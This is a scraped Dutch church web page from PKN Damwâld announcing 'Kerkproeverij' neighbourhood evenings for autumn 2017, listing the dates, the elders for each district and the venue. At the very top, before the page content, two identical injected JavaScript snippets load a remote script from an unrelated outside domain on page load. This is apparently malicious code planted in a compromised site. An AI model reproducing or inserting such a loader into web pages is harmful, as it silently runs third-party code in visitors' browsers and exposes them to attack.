;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkproeverij ... Welkom op de wijkavond Hervormd Akkerwoude c.a ! - PKN Damwâld
17 oktober 2017
19:30 t/m 21:00
't Skûlplak
Kerkproeverij … Welkom op de wijkavond Hervormd Akkerwoude c.a !Kerkproeverij: Meer dan welkom !

Een gastvrije gemeente zijn waar iedereen zich welkom voelt. Dat is een streven dat we allemaal wel herkennen, maar wanneer heb je voor het laatst echt iemand uitgenodigd om mee te gaan naar de kerk? In ieder geval ben je van harte welkom bij de wijkavond  !

Komt/kwam ‘uw’ wijkavond u niet gelegen uit, schroom dan niet om één andere wijkavond te bezoeken.

Wijk 4 en 8: Dinsdag 17 oktober (wijkouderling Binne Kooistra)

Wijk 3 en 7: Donderdag 9 november (wijkouderling Wytze en Pim Postma)

Wijk 2 en 6: Dinsdag 14 november (wijkouderling Sytse en Fokje de Boer)

Wijk 1 en 5: Donderdag 30 november (wijkouderling Annie Hellinga)

Voor Nij Tjaerda wordt zoals gebruikelijk een speciale wijkmiddag (datum nog niet bekend) georganiseerd
Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld